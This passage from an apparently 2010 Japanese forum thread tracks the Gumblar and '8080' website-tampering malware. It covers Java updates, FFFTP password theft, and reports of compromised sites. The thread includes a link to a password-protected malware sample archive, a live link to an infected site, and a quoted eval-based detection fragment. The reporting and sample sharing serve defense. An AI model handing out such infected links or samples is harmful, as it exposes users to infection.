
同人の方もかなり感染してると思う

>>108
>>7をやって、今後も最新版がリリースされたら、すぐに最新版を
インストールするようにしてれば、どっちでもいいよ

>>108
それ以前に対策をしっかりしましょう

so-netはトレンドマイクロより優秀だな

>>107
そーゆー貼りかたやめれ。
1コ上の階層を調べてみませう。

あと、コードのタイプを書いておくと
最新型が大好物の検体提出屋さんが拾いやすくなる(はず)だから
可能ならタイプ(CODE1とかDEBUGとか)を書いてくれ。

>>99
勝手に命名してｽﾏｿ(仮名って書くの忘れた)
で、名無し最新型の呼び名はどうするよ？

>>117
so-netの無印で良くね

>>109
ありがとうございます、avaでいきます

>>114,115
そうですね、>>7チェックします

>>108
どっちもやめとけ

無料では歯がたたん(笑)

でたー有料厨

AVでは購入厨とは呼ばないのか

優劣は余所で議論しろ

でたーのは古事記なのか

http://1-noriba.net/

>>107
whoisよりめるぽ

知らん間に絶賛進化中かよ・・・すげぇなこの技術

真面目に使えばめちゃめちゃ儲けられるんじゃないのか。

こういう人らってケタ違いに儲けてるらしいよ

裏市場でケタ違いに儲けて、万が一逮捕されても出所後には腕を見込まれて有名セキュリティ関連企業に就職とかあるよなｗ
まあマルウェア作成者の逮捕なんてされる方が珍しいだろうけど

っと、また見逃し。。。
>>85
乙乙乙です！

はやく直ればいいのですが…

海外サイトでもGumblarって流行ってるのだろうか

仙台市災害ボランティアセンター
ttp://www●ssvc●ne●jp/index●html　（ru:X＝DEBUG改）
未通報

ttp://www4.atpages.jp/ksyk/

ここの３．に書かれてるNEC製パソコンは古いJavaが見えないってホント？

airseasite.ru
きりがないなぁ

>133
マジ
しかもアンインスコできない(最新版消すと古いのに書き戻される)

こいつ、まじでやっかいだな、いろいろとパターンをかえてきやがる

あやしいところは、チェッカー全部とおしてからみにいくんだな

どうやら新パターン構築中で沈静化してるみたいだな

>>133-135
！？
家族のノートPCはNECなんだが…
一応対策しとけと言っといたが駄目…なのかい

>>132
めるぽ

>>139
新しいＪＡＶＡいれとけば大丈夫

>139
コンパネいじる・JavaRa等の削除ツールを使うetc
いろいろ手はあるが確実性に欠けたり自己責任なんだよなあ

消せばコンパネからjavaが消えるなら問題ない
残るなら、あらかじめ仕込があるってことだから、神経質なひとは削除ツール使うしかない

>>139
とりあえず最新版入れれば、古いバージョンを決め打ちされない限り大丈夫のはず
出来れば決め打ちに備えて、古いバージョンは一掃したいけど…

ありがとう
細かいこと言ってもわからんだろうし俺がなんとかやるか…

>143
ごめん、言葉が足りなかったorz
消しても窓のコンパネにはがっつり残るんだよ＞NEC

Java最新版のコンパネってか設定にバージョン管理する項目があるから
そこで古いバージョンのチェックを外せば回避できるかな？って思ったんだ

ROMに戻る、ｽﾏﾝｶｯﾀ

だから大手メーカーのPCは絶対買わないという人居るよな。
昔NとかFとかのメーカー、購入したときの情報が.txtで残っていて
JAVAとJavaスクリプトの組み合わせで読み取れて個人情報抜かれるなんて都市伝説あったなぁ。

スレチすまん。もう寝る。

古いjava消したらEclipseとNetBeansがおかしくなったでござる

javahome影響するんだっけか

JRE 1.5はこの前出たu22が最終なんだよな。
本当に1.5じゃないと動かないシステムを組んでいるところは、これ以上の新たな脆弱性が
発見されたときはどうするんだろうか。

くれくれで申し訳ないですが教えてください。
サーバからローカルにファイルをすべてコピーして
スクリプトの部分を一括置換で消そうとしたのですが
ファイルが開きません。
これは新種の亜種でしょうか。
通常のダブクリでもアプリからでも開けません。
今はhogehoge.htmlをhogehoge.txtにリネームして開いてます。
（この方法なら開けるんです）
ただファイル数が5000をこすので一括置換したいんです。
開く方法をご存知の方いらっしゃいましたら教えてください。
よろしくお願いしますorz

サーバ側にしかファイル残ってないの？
アップロードする前のファイルはどこへいったの？
オリジナルファイルがないってありえなくね？

あと開かないってのがどう開かないのかわからない
単に関連付けが変わっただけとかじゃなかろうか
エスパー先生おねがいします

>>152
ありがとうございます。
静的ページはオリジナルがあるのですが
CMSで生成されたページはサーバにしか残ってないんですorz

>>153
例えばメモ帳にドラッグ＆ドロップすると「アクセスが拒否されました」とアラートが表示されます。
ドリウィで開こうとすると
「C;\Documents and ・・・・hogehoge.html へのアクセスは拒否されました」と表示されます。

「プロパティ」−「セキュリティ」タブでのアクセス許可すらいじれないようになってます

テキストファイルとして開けるのなら
置換機能のあるテキストエディタ使えばいいんじゃなかろうか

3000以上あるファイルの拡張子を全部txtにってのは最終手段だと思ってますorz

開けないファイルそれぞれがウイルスを内包している模様。ダブクリしたり開こうとするとアンチウイルスソフトから警告が出る。

5000もあるならファイルネーム一括置換でhtmlをtxtにリネーム

ウイルス名はJS/Obfuscated。ちなみにアンチウイルスソフトを切っても警告が出てこなくなるだけで、ファイルを開くことはできない。

Kaspersky Online Scannerのメンテナンス長すぎなんとかしろ

>>160
rename *.html *.txt
<<<
でbatを作ってリネームしたんですがbatファイルのあるフォルダにしか適用される下の階層のhtmlファイルなどの拡張子がそのままなんですorz

>>162
同感

リネームツールなんか山ほどあるんだから、ベクター辺りで探して見れ

古いバージョンのJREじゃないと不便って人は
もうブラウザの方でJAVAの実行を切っておくしかなさそうだな。
で、どうしても必要な時だけ手動でONにする、と。

えっ？

意味わかんない、ねー

えっ　なにそれこわい

えっ　なにそれ脆弱商売

自演乙

セキュリティソフトウェアメーカーのPC Toolsによれば、
マルウェアのロシア発のマルウェアの割合は27.9％。これに対して中国の割合は26.5％。
過去の調査では世界2位になってしまった米国は今回、3位（10％弱）となった。
　　　　　　　　　　~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅した
にも関わらず、ロシアの生産量が落ちていないことを指摘している。

PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Network
がいなくなったところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。
　　　　　　　　　　　　　　 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
「結果として、過去にないくらい多くのウイルスやスパイウェアがロシアから出てきている。
そして、マルウェアの複雑さが増している」（Shevchenko氏）
　　　　 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織
よりも追跡しやすかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティング
サービスが、マレーシアや中国、パナマ、シンガポール、タイ、トルコ、インドのサーバに目を
向けている」

http://japan.zdnet.com/news/sec/story/0,2000056194,20367817,00.htm

名探偵コナンならあっさり

おせわになってます・・・トップページが書き換えられてる(忍者HP質問板)
ttp://csbbs.ninja.co.jp/Thread_View/40700/

新パターンらしい

やる気！元気！井脇！ ガハハ！

忍者って解析ツールのとこか

まとめ第9版
ttp://labs-uploader.sabaitiba.com/virus/download/1264799189.rar
PASS:virus

もう嫌だこのウイルス・・・(´・ω・｀)

そういやJavaって以前は最新入れても思いっきり
古いver残ってたけど、Java6 Update12あたり？（うろ覚えだけど）
から一応「上書き」されて古いのは消えるようになってますよね。

Firefoxだと古いのは残って消す必要あるし、プラグイン怖い
WhiteListとか意味ねええええ

古いJAVA消してよかったんだな。ディスク容量が切迫してるとき
邪魔なんだよなって思ってたんだけどｗ

>>177
いつもありがとう、ご苦労様ですm(__)m

>>177
解凍後 tar.gz にてM$,ClamAvに送付。

俺のパソコンもNECだからかな？ プログラムの追加と削除にJREが載ってない。
とりあえず>>2にあるjavaのバージョンチェックして、そこで出てきた最新版を
インストールしたんだけどこれで大丈夫なのかな？ 情弱で申し訳ない。

上げてしまった。重ね重ね申し訳ない…

お絵ちゃ大好き！な腐まんこばっかりになってしまった

>>182
Secunia Personal Software Inspector (PSI) 1.5.0.1で
インストール済みのアプリが最新かどうか古いバージョンがあるかチェックするといいよ
ttp://secunia.com/vulnerability_scanning/personal/

javara使えば古いものからゴミまで消してくれるでござる。

>>162
ニフティの方は使えたよ。（@niftyウイルスチェックサービス/中身はかすぺる）
本家がメンテしてるってことは新しいやつに対応してないのかもしらんが。

古いバージョンのJava Runtime Environmentはアンインストールしてもよい − ＠IT
http://www.atmarkit.co.jp/fwin2k/win2ktips/994uninstjre/uninstjre.html
2008/03/07
■ Java Runtime Environmentをアップデートすると、新しいバージョンが新規にインストールされる。
■ Java Runtime Environmentの容量はバージョンによっても異なるが、70Mbytes以上もある。
■ 古いバージョンのJava Runtime Environmentをアンインストールすれば、ハーディスクの空き容量を増やすことができる。

>>187
あれ、こないだやったらエラーで使えなかったぜnifty

フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html

ニフティここずっと死んでるって話だったけど生き返ったのか

>>190
それ、ある意味凄いな
知名度があるってことか・・・

可能性
・単に知名度があったから
・犯人は日本に詳しい
・犯人は日本人

>>190
まじかよ。。

「白痴ランド」のトップにあるリンク先，GumblarChecker 2で検出
リストのうち，最後の三箇所
ttp://www●hakuchi●jp/bodypaint/
ttp://www●hakuchi●jp/57577/
ttp://www●hakuchi●jp/OTSUYA/

白濁ランドに見えた俺は病気

>>190
それ普通に使ってて、年末にJRE未更新状態で感染サイト踏まされたが
自サイト改ざんは未だなくスキャンでも何も出てこない
何故俺は助かったんだ…

>>195
えっち

>>190
まぁよく使われるFTP蔵なんてそんな数あるわけでもないんで
有名どころは網羅されてるんでねーの。
FileZilla、WinSCP、FTPExplorer、etc.

FTPプロトコルのキャプチャぐらいはしてるんじゃないかな？
だからFFFTPだけに限った話では無いわけで。

FFFTPだけだったら海外サイトまでなぜ感染するんだろうなあ、とか思ったり。

SFTPのおいらに隙はなかった

>>185
どうもありがとうございます。
ちなみにjavaの更新方法は間違ってないよね。確か6 Update 18ってのに更新したはずだけど…

>>199
いやFFFTPを起動していないのにサイトやられちゃったという話が出た
(FFFTPはレジストリかiniに保存する)ので驚いているわけで。
世界でおそらく最も使われているのはFileZillaで、これは前から
malwareにしょっちゅう抜かれてるんだけどね。

>>202
感染したPCの中を覗ける

>>202
なるほど、そういうことね。
ありがとう

>>202
マジでこえーよ

俺のnec lavie LR500/c（五年前）だと、java6 Updateをアンインストールすると
コンパネに残らないな

残る人の機種は何年前？

8080てなんて読むの？
ハチゼロハチゼロ
ハチマルハチマル
パオパオ

ハチレーハチレ−
で読んでるけど

>>189
何度か繰り返しやってたらできたよ

Java使うアプリってそんなにあるかな？
通常のネット閲覧ではあんまり使わないから余計な物は入れない方が良いと思う。

ガンブラー型ウイルス猛威、サイト改ざん悪質化
1月30日14時41分配信 読売新聞

http://headlines.yahoo.co.jp/hl?a=20100130-00000527-yom-soci

＞新タイプでは、従来型と違い、クレジットカード番号を盗む仕組みが加わるなど、犯罪の意図が明確になってきているという。


これってネタ？　マジ？

>ところが、この頃から今年にかけて“第３波”が来襲。今度は、不正サイトに誘導された後、偽のウイルス対策ソフトをインストールさせて、クレジットカード番号などを盗んだり、スパムメール（迷惑メール）配信に利用されたりする恐れがあるという。


Security Toolのことだろうからマジと言えばマジ
今は英語版しかないみたいだけど、日本語版でも出れば騙される人激増するだろうね

ここからは妄想だが、引っ張ってくるマルウェアにキーロガーが加わってくれば、Security Toolのようなフィッシングに近い形の盗み方と違って
PCで番号打っただけで盗むことは可能よね

＞不正サイトに誘導された後

って書いてあった・・・ガンブラー本体じゃねえじゃん・・・
何だこの如何様記事

別に間違ってないけど

>>214
社員おつ

>不正サイトに誘導された後

ここが間違ってるような気がする。Security Toolって誘導というより8080系に感染したら自動的に引っ張ってきて強制インスコだったような・・・
それともこの記事はSecurity Toolとは別のこと言ってるんだろうか？

>>210
ミクシのアプリとか

で、FFFTPはアンインスコした方がいいの？

その記事にある「地方自治情報センター」の呼び掛け、説明文がＧＥＮＯ仕様なんだな。
後半が昨年秋の古い講演会資料の転載になってるから生じている問題なんだが、
普通のお花畑公務員は、それが最新の情報と勘違いするぞ。

多分センター自体がGENOと8080の違いについてわかってないんだろう。
文頭に別種と書いてはいるが、どう別種なのかわからないままの資料丸写しに見える。
大体、検知システムは来月から試行って段階だしな。
無料だが。

まあなんだ・・・持ち上げる気はないんだけど、So-netの記事が一番まとまってると思うよ
スレの最初から読む気が無い奴にはこのリンク出しときゃだいたい分かるだろ。まあそんな奴は長文読む気がない奴も多いのが問題だが・・・

「ガンブラー」「サイト改ざん」めぐる基本のＱ＆Ａ　〜　何が起きている？ 対策は？
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

>>218
Sota's Web Page
"FFFTPをお使いの方に重要なお知らせ"
ttp://www2.biglobe.ne.jp/~sota/index.html

警察や関係機関からの発表を丸書きするだけなのが新聞だよ。
当然 自分らで確認も理解もしてません。

公式で、実質アンインストール一択ってアナウンスがでたのか…

218ではないがアンインストールした
XPでソフトウェアの追加と削除から削除したら
>>221にある消去すべきとこ
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options \Host(n) : nは数字
が
HKEY_USERS\固有の番号\Software\Sota
までで以下ないけどこれでいいのかな

最新にしておけば>>221は消さなくても今のところOKですよね？

>>225
おまえがそう思うのならばそうなんだろう（AA略

主語抜けてて何が最新なのかまったく分からん

>>227
すまん>>2にあるやつ

136 名前：名無しさん＠お腹いっぱい。[age] 投稿日：2010/01/30(土) 13:15:35 ID:TnywA9GR0
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性
http://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html
Thanks and Farewell FFFTP
http://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/

設定はiniに格納すればおｋ？

138 名前：名無しさん＠お腹いっぱい。[] 投稿日：2010/01/30(土) 15:09:40 ID:IQxi/7CR0
>>136
うん、iniに保存で大丈夫。
レジストリ狙ったマルウェアが出てるだけだから。
アンインストール（笑）

139 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/30(土) 15:22:07 ID:D0RKI4Os0
ウチのレジストリには、>>136のリンク先で示されてる項目が
ないんだけど、そーいうもん？

140 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/30(土) 15:31:26 ID:TnywA9GR0
>>138
ありがとー

自分はDドラにインスコして
CドラのOSは数回再インストールしてるから、
レジストリには何にもないよ>>139
。
なんだまだまだ使えるんじゃん、それをfarewellてｗｗｗｗｗ

大丈夫かこいつら

iniファイルも標的にされてるのがわかってないんだろうな
FFFTPと心中するんだろう

>>228
心中したいならば、別にそれでかまわんよ、
このウィルスに感染しても個人サイトなら個人の問題だからね。
金かせぐ仕事でFFFTP使ってるなら、やめとけといっとく

対策とっても感染するときは感染するし、好きにすればよかろう

免責事項の明記と今回の告知で作者は十分に制作者責任を果たしているからな。
あとは何が起こっても完全に使う奴の自己責任だわ。

>>228
その対策を全部やってれば"今のところ"感染はしないのでFFFTP使ってても問題なし。"今のところ"はね
後、以前に一回感染してたんならパス変えなきゃ意味無い

でも、今回のに関係なくクライアント変更したりSSLなFTPとか別のプロトコルに変えたりIPでアクセス制限かけたりした方が無難だよね
鯖側が対応出来てれば、の話だけど
FTPのID/Pass盗み取るマルウェアは8080系だけじゃないんだから

まあFFFTPの作者さんのこういうアナウンスをするっていう決断は素晴らしいと思う

使ってるWebサーバのFTPは、SSL対応してないないな
FFFTPのレジストリ見たけどhistory01〜04の項目もあって
IDPW入力した履歴が残ってるかも？

もうバージョンアップしないってことだから、どのみちFFFTPからは離れざるをえないけどな

今回の告知でわかることは、もう更新はないってことだからな＞FFFTP

FileZilla,SmartFTPでおｋだろ

FileZillaはPass保存してたら暗号化されずに平文で保存されてるぞ
FFFTPと同じ危険性がある…っていうかもう既にFileZillaから盗み取るやつあるんじゃなかったっけ…？

どのFTPツールが無難なのかね？
履歴にもIDPWが残るタイプだと危険かね

FFFTP削除してしまって、レジストリみてもFFFTPがないのですが、
初期設定だとINIファイルに保存設定になってるのですか？
それだと安心なのですが。インストールしたフォルダもなくなってて
確認のしようがないのですが。。。

ini保存もヤバいんかね。
つーか他にffftp相当の使いやすさで、SFTP対応で、日本語メニューで、アカウント情報が盗まれにくくて
というのが全て揃ったftpソフトって何があるかね？

>>241
初期設定はレジストリ
アンインスコをプログラムの追加と削除から行ったのなら、レジストリも恐らく消えてる。

レジストリから情報盗んでるとすると、完全に日本狙い撃ちされてるってことになるな。

>>242
ないものはつくるしかないと聞く

>>243
ありがとうございます、安心しました。

FFFTPはFileZillaと違って更新が途絶えて長いのと、日本での需要の高さから
格好の狩場として標的にされてる節がある

貧乏人はインターネットするな時代になりつつあるような

更新の長期停止されたFFFTP集中砲火とかよく調べてやがるな、このマルウェア製作者、
むかつくくらいだ

sftp使えってこった

それもソースコード解析して暗号化してたパス解読してるんだから…よくやるねぇ
それだけ稼げてるんだろな

フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです : ライフハッカー［日本版］, 仕事も生活も上手くこなすライフハック情報満載のブログ・メディア
ttp://www.lifehacker.jp/2010/01/100130ftpffftp8080id.html

> 「UnderForge of Lack」では、消去すべきレジストリを記載してありますので、『FFFTP』のユーザーさんは、参考にして下さい。
ttp://www3.atword.jp/gnome/2010/01/28/hammmer-and-anvil-a-blacksmith-in-the-dark/

> 代わりのFTPソフトとしては、『ALFTP』、『WinSCP』、有料ですが『NextFTP』（3ヶ月間の無料試用期間あり）などをどうぞ。

genoが出たときはここまで厄介なバージョンアップ遂げるとは思わなかったな

初代Gumblar(通称geno)と8080系はまったく違うものと言っても良いのに、バージョンアップと言うのはこれ如何に
作者も恐らく別人だろうし

フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性
http://kasim.kashima136.com/z19z00703/?link/news/ffftp.html

この辺も読んどいた方がいいかも。

>>253
お前最悪だな
おまえ等踏むなよ

>>253
危険
飛んだらダメ

FFFTPとは全く関係ない、8080系に感染済みサイト


念のためにスクリプト切っといて良かったｗ

感染〜感染

だれか規制要請板に253通報してきてくれ
俺今出先で携帯なんで無理
これは悪質だ

危ない危険て言ってるけど、テキストブラウザで開けるようにしとけば
まず問題ないんでないの
それか通常ブラウザでもスクリプト類offにしとくとか

>>253
ひどいスパムサイトだな

いびきの原因

コードの微変更で発掘しにくくなってきちょりまつが･･･
皆様如何お過ごしでせうか？

とりあえず最新型っぽいのを1件投下
「BAL BAL NET」
tp://www●balbal●net/
※サイト内全滅の予感

つーほー＆検体提出ヨロ

　　　γ⌒ヽ
　　＜　・､,,,;;,）　　　　　　ﾊ,,..,,ﾊ
　 ＜　つ＝つ　　　　　/;;・ω・;;ヽ
　 ノ　　 ﾉ三）　　　　　(;(　^^^　);)
∠、　m）＝m）..　　　　`'ｰ---‐´

　ガンブラー　　　　　　トトロイ
（2009 〜 ） 　　　　　（2010 〜 ）

FFFTP並みに簡単なソフトないよな。
開発続けて欲しいわ。

>>261
二段目のスクリプトの中身がNothingになっていた件ｗｗ

FFFTP使ってるとかどんな情弱
FTPクライアントはFireFTP使ってる

>>261
おつ！
シマンテックに提出しました。

とりあえずVirSCANの結果
http://www.virscan.org/report/7626fd91e4baba2333ade30e0eeed687.html

他のFTP使っても結局レジストリかiniファイルに保存されてしまうから危険度は変わらないよね

【FFFTP】　FTP接続時のパスワードが抜き取られサイトの改竄相次ぐ　【Gumblarウイルス】
http://tsushima.2ch.net/test/read.cgi/news/1264841726/

暗号化されてれば危険度は減るがな

FFFTPもパスワードは暗号化されてレジストリに登録されてたけど解析済みなんだっけ？

>>267
有名ソフトほど狙われやすい
マイナーソフト使えば使うほど狙われにくい

FFFTPがいちばん日本で普及してるから狙われたんじゃね？
おれはSFTP使えるWinSCPメインだけど

ホームページビルダーは大丈夫？

>>270
一般的なソフトのパスワード保存って、
もしくは簡単な独自アルゴリズムで暗号化・複合してる、
もしくはソフト本体側に埋め込まれた共通鍵だけだからデバッガ使って解析されたらばれる

暗号化っていうよりエンコードに近い

そかーネットがめんどくさいものになってきたな

>206
一昨年

>>261
McAfee送信完了

>>261
avastにチェストから送信しました

>>270
オープンソースだから誰にでも分かる

オープンソースだから暗号化の部分だけ書き換えて使うって手もある

WinSCPダウンロードしに行ったらソースも公開されてるみたいだね
そのうちやられるんじゃないか？

パスワードを保存するとかそういうのは全部アウトじゃねーの
パスワードデータベースをパスワードで保護するとかしないといかんな

脳に保存しとけばいいだろ

>>281
そうみたい
パスワードを保存するのが危険だって
感染実験してみた人が書いてた
FFFTP以外にもメジャーどころは情報盗まれたみたいだよ

マジかFFFTP・・
しかし毎回パスワード打つようにしてもキーロガー仕込まれてたら
意味無いのですよね

トークン使え

その為にプロセスコントロールでKBを監視するのが最近の流行

WinSCPで鍵認証の俺に隙はなかった

・・・けど秘密鍵まで持ってかれたらアウトだよな

朝日オート(最新型)＊再々改竄＊
tp://horizon●f00●jp/

SELECT ROOM(GNU GPL)
tp://selectroom●net/2007/10


最新型が釣れないよ･･･ orz

>>288
<script>タグをコメントアウトしてるのは何でだろう？
管理者のとりあえずの処置？
それとももともと？

あれ、こないだもコメントアウトしてる所なかったか

キーロガーって、叩いた順番を覚えてるだけであって、
パケそのものを盗ってるわけじゃないんでそ？
だったら、短文登録しておいて、たとえば「パ」→「ｐａｓｓ」みたいに
変換して使えばバレなくない？
あとは、１文字おきに打って、マウスでカーソル動かして残りを
埋めるような形でパス打つとか。
上の例だと「ｐｓ」→「ｐａｓ」→「ｐａｓｓ」

>>261
めるぽ

馬鹿がいる・・・

ニュー速に貼られてたコレは？
://kasim●kashima136●com/z19z00703/?link/news/ffftp●html

>>294
http://pc11.2ch.net/test/read.cgi/sec/1263865118/253-

>>288
そこの中古車屋は修復してまた改竄なの？それとも放置なの？

> 253で貼られて叩かれてますが

普段Fedora+Firefoxでブラウジング、サイト更新時は
CMSを使っている俺に隙はなかった
みんな無理せずに出来の悪いOS投げ捨ててこっちにおいでよ

PDF閲覧ソフト・Flash再生ソフト・Java？なにそれおいしいの？
プロプライエタリの塊なんぞ最初からノーサンキューです

へぇ　そいつぁすげぇや

>>288
上：くこから ttp://f00.jp/contact.html
下：めるぽ

>>295
>>297
すまん。
リンクあぼーんしてたんで見えてなかった。

>>285
個人でトークンって使えるものなの？

>>261
かすぺ
> Hello,
>
> index.htm_, index2.htm_, profile_index.htm_ - Trojan.JS.Redirector.at
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> The answer is relevant to the latest bases from update sources.
>
> Please quote all when answering.
> -----------------
> Regards, Baranov Artiom
> Virus Analyst, Kaspersky Lab.

前スレでめるしてたんだけど、最初っからフォームでいけばよかった。。。
>>288 上 対応の返事あり。404を確認。

>>296
朝日オートの件だが
改竄→無効化(コメントアウト)→再改竄･･･
というループを繰り返してる。

※最新型と1コ前の型の違いは「eval」の有無

>>304(45)
乙！！


そろそろ釣れるかな？
".replace(/\^|\$|@|\)ig," "eval("

>>16の
・Gumblar Checker 2
ttp://gumblarchecker.crz.jp/
が白紙になってるけど。死亡？

>>307
1時間くらい前から、白紙になってるね。

アメリカ研究振興会
ttp://www●amsf●or●jp/index●html

砂川商工会議所
ttp://sunagawa-cci●com/index●html

大阪府中小企業団体中央会
ttp://www●maido●or●jp/index0●html

どれもevalつき

>>298
たんにマイナーだから狙われないだけ
もしFedra+FirefoxがWindows+IEなみに普及してたらターゲットにされて攻撃されまくる

ここで逆転の発想
弄られる前にサイトを閉じる

Fedora（笑
Gentooだろ常識的に考えて

寝る前に投下･･･と。

サイト名省略w(きっと最新型)
tp://www●3renshinan●com/


最新型の検出状況
http://www.virustotal.com/analisis/103d463d367bd9f68b9bcf93ed1ae58f0ca4debe38213bdcf70536a2f713e412-1264873639

>>309
めるぽ
めるぽ
めるぽ

>>313
めるぽ　（スパム逝きの可能性大）

JRE6Update17での感染報告ってありますか？
イマイさんにリダイヤル攻撃されるんですね

GENOｳｲﾙｽによる改ざんじゃなくてGENO自体がｳｨﾙｽ改竄している件

詳細はWikipediaの編集履歴を参照

新型はdocument.writeが無くなったんだね

gnome氏がキレてる
辞めてほしくないなあ

新型( >>309 >>313 )Dr.WEBで全機撃墜(JS.Redirector.2)。

普段あまり頼りにならんけど、8080引っかけたい人はどうぞ。
ttp://drweb.jp/support/link_checker.html

>>316
じゃあ業務停止命令されなきゃな
やはりGENOが去年からのウイルス騒動の元凶じゃないのか？
ガンブラー系や8080系作ったのもそいつらだって疑われて当たり前だ

さくらってALFTP対応してる？
してるなら乗り換えたいな

>>318
ボランティアでやってるのにここまで求められちゃかなわん、と
ふくれているのかもしれんが、
「当該記事の修正を迫」った人への執拗なまでの当てこすりといい
「みんな助かってます、どうか止めないでください」との声が上がることを
期待しているかのようなあざとい誘い受けといい、ガキかよ、と。

そんなにやってらんないんなら止めりゃいいのに。誰も頼まないから。

フリーソフト作ってたりするとわかるけど
最近の一般ユーザーはマジキチ

わかるわ〜

事情がよく分からんのだが、FFFTP作者本人からの抗議でもあったん？

それとも第三者なのか

みんな何の話してるの？Gumblar Checker？

カッカするのは分かるが、確かに
当て擦りっていうの？
あのしつこくてくどい皮肉めいた書きぶりは
ちょっと大人気ないわ

頭冷やして、このまま続けてくれとは思うけど

>>322
いやあ俺は助かってるからさ
そんなあてこすりは眼中にはいらないほど助かってるから

サイト持ってるから気持ちわかるところもあるし
彼の文体も好きなんだよね

>>326
gnomeさんとこ。

なんか誤解を与えかねない（？）記事があってクレームがきたみたい。

>>325
第三者だろ、曽田さんはそこまで暇じゃない

>>329
�d。

GENOざまぁあああああああｗｗｗｗｗｗｗ

>>330
だとしたら、それこそ「誤解を招く表現」だと思うんだけど

あれだと普通にSota氏から抗議がきたように読めちゃうんだが

>>333
お前みたいな反応をかえすやつといちいち付き合ってられん。

切れた第三者が曽田さんに謝れとか見当違いなことふっかけてきたんだろ

とりあえずおまいらソースを出してくれ

いや別に無理に付き合ってくれなくてもいいけど

ただ、あそこで誤解を招く表現の上塗りしちゃってどうすんの？と

俺がSota氏だったらああいう書かれ方はちょっと迷惑かなぁ、と

今まさにそういう煩わしさに巻き込まれているGnome氏なんだから
余計慎重になってほしかったな、と

人名出されても何のことかわからん

>>322
雑音って一度気にし始めるともうだめなんだよ
そればかりが気になってしょうがなくなる
どんな人でもそう
やめるやめないは本人の好きにすればいいが、お前のそのコメントはだめだな
こんなところでぬるま湯につかってるんだから

>>337
迷惑も何も本人はブログ以外ほとんどやってないんだから、迷惑もくそもないだろう

スゲー論理だなｗ

個人ブログなんだからいいじゃん
企業や報道機関が無知でいい加減な報道しても放置状態なのに

情弱「FFFTPの作者が悪いGENOが悪い」

真っ赤な顔して熱湯風呂入ってる人って大変ッスね

情弱が多くて大変だな

変な正義感ふりかざすやつが増えたよな、ご本人にかわってクレームつける
俺かっこいいとか

>>325
スレッドとか立ったなかった？
文章を一部抽出したような内容で。

ニュース速報あたりに立ってたな、普段ソースソースうるさいくせに
中途半端に引用された文章にくいついて盛り上がってた

よく分からんけど、


どこかで「FFFTPは危険！」みたいな注意喚起スレが立って、
gnome氏の記事が（氏の意図にそぐわない形で）部分引用された
↓
gnome氏の「FFFTP自体がマルウェア」とでも言いたげな記事を読んだ
（そう誤解した）第三者が
「FFFTP自体は悪くないだろ！記事を書き直せ！」とブログに凸した
↓
gnome氏、「お詫び」という形で、ささやかな反論


みたいな流れ？（んで、FFFTP作者のSota氏はこの件に絡んでいない）

中途半端な知識持ちって一番たちが悪いな・・・

誤解乙
終了！

まぁでもあの書き方だとオレも Sota さんからクレーム来たのかと普通に思っちゃうわ。

>>352
そうか？
それだけは無いなと読めたが

お前がそう思うんなら（ｒｙ

実はクレーム凸した人がこのスレに居るとか

FFFTPが悪いみたいに思い込んでる人が増えてるみたいだな
このスレにもいるし
初期の頃から分かってることだがその他のFTPクライアントも同様なのに

実はgnomeも（ｒｙ

最初に記事にしたアソコが悪い。

以前見たもっとまともな記事は
記憶したパスワードが盗まれる対象のソフトを複数あげてたな
サイトアドレスは記憶にないけど

ホームページビルダーもおわったな

突然で申し訳ないんだけど、
自分のサイトはヤフージオシティーズが提供している
ジオクリエーターで製作しているんだけど、
こういうタイプのサイトもＧｕｍｂｌａｒや8080系のウイルスによって
改ざんされる事あるんですか？
アレ、ＰＣから直接ＨＴＭＬファイルや画像ファイルが開けて便利なんですけど
とっても心配です。

ちなみに使用ブラウザはＩＥ８
アドビリーダーもフラッシュも最新版に更新済み
(Ｊａｖａスクリプトはリーダーのみ切っている
ＩＥはお絵かき掲示板使用の為切っていない)

Gnome使ってるけど、マジ意味わからん。

KDEつかおうぜ

いやいやLXDEで

つxfce

GUIなんて時代遅れ

gnomeのスルー力のなさというか、意外に耐性が低かったのに驚き。
ああいう口調や文体を使うってことは、そのあたりに相応の自負があってのものだと思っていたよ。

>>367
それはちょっと思った
本人が想定してたより，あのブログの影響力が大きくなりすぎてたのかもね

gnome最新版は勝手に文章を書くのか

>>369
ワロタｗｗ

>367
どうも初めてではないみたいだしな
耐性つくか脆くなるかで、Gnomeは後者なんだろう
ここは生ぬるく見守ろうぜ

ほびーちゃんねるって感染した？
ttp://hobby-channel.net/index.php
見れないんだが

メンテでPHPやSQLが停まってるとかじゃね

Gnomeは去年のGENOの時も大量の馬鹿の特攻くらって愚痴ってなかったか？
毎度毎度大変だよな

>>374
Nifty感染疑惑の時かな

>>373
そうでしたか、すみません。

ガンブラーチェッカーは何で今見られないんだろ

このウィルスってロシア人が作ってるの？それとも日本人なの？

少なくとも日本人ではないな

大陸系

ブログのurlplz

チキンの日本人が作れるわけない

感染改竄されてる所って同じweb屋が請け負ってるんかな？

チカンの日本人に見えた
これもウイルスのせいか…

[2010/1/31]
有志の手により、パスワード漏れ対策版のFFFTPが公開されました。

その有志がウィルス作って・・・ｺﾞｸﾘ

さらに上はいるからな。

>>377
自分もなんだか心配だ

